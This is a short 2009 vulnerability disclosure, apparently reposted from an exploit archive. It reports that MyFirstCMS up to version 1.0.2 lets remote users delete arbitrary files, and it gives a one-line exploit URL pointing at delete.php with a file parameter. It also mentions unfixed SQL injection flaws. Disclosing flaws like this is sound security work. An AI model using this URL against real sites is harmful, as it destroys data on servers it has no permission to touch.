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MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--

[+] Author   : darkjoker
[+] Site     : http://darkjoker.net23.net
[+] Download : http://ostatic.com/myfirstcms

[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

# [2009-05-26]

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